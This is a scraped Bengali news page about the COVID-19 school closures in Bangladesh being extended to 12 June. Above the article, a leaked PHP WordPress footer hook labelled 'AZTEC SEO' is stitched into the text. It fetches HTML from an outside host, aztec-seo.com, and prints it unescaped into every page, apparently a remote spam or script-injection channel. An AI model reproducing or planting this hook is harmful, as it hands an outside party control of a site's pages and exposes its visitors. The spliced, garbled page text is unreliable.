/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99); শিক্ষাপ্রতিষ্ঠানে আবার ছুটি বাড়ল | Dhaka Sky News

সাবমেরিন নির্মাণের ক্ষেত্রে বিশ্বের ৫ শীর্ষ দেশের একটি ইরান: কমান্ডার

আগের সংবাদ

‘ভিয়েনা সংলাপকে ভিন্নখাতে প্রবাহিত করার চেষ্টা করছে আমেরিকা ও ব্রিটেন’

পরের সংবাদ

শিক্ষাপ্রতিষ্ঠানে আবার ছুটি বাড়ল

দেশে মহামরি করোনাভাইরাস প্রাদুর্ভাবের কারণে শিক্ষাপ্রতিষ্ঠানের চলমান ছুটি আগামী ১২ জুন পর্যন্ত বাড়ানো হয়েছে। শিক্ষামন্ত্রী দীপু মনি আজ বুধবার দুপুরে ভার্চুয়াল সংবাদ সম্মেলনে এ তথ্য জানান ।

এ মহামারি ভাইরাসের সংক্রমণ এড়াতে দেশের সব শিক্ষাপ্রতিষ্ঠান ১৪ মাসের বেশি সময় ধরে বন্ধ রয়েছে। চলতি বছরের মার্চের শেষ দিকে দেশে শুরু হয়েছে করোনার দ্বিতীয় ঢেউ। এতে সংক্রমণ ও মৃত্যু বৃদ্ধি পেয়েছে। এমতাবস্থায় এপ্রিল থেকে দেশে লকডাউন চলছে। যদিও সম্প্রতি লকডাউন শিথিল করা হয়েছে।

সরকারি পূর্ব ঘোষণা অনুযায়ী শিক্ষাপ্রতিষ্ঠানের ছুটি শেষ হচ্ছে ২৯ মে। এর মধ্যেই শিক্ষাপ্রতিষ্ঠানের ছুটি আরও বাড়ানোর সিদ্ধান্তের কথা জানালেন মন্ত্রী।

চীনের উহানে ২০১৯ সালের শেষের দিকে প্রথম এ ভাইরাস দেখা দেয়। পরে তা বিশ্বব্যাপী ছড়িয়ে পড়ে। বাংলাদেশে প্রথম করোনা শনাক্ত হয় গত বছরের ৮ মার্চ। এর ১০ দিন পর প্রথম মৃত্যু হয় কোভিডে। করোনা পরিস্থিতির কারণে গত বছরের ১৭ মার্চ থেকে সব শিক্ষা প্রতিষ্ঠান বন্ধ রয়েছে।

২৩ মে থেকে স্কুল-কলেজ এবং ২৪ মে থেকে বিশ্ববিদ্যালয় খোলার ঘোষণা দেওয়া হলেও কোভিড-১৯ এর প্রাদুর্ভাব বিস্তার অব্যাহত থাকায় ছুটি কয়েক দফা বাড়ানোর ঘোষণা দেয় সরকার।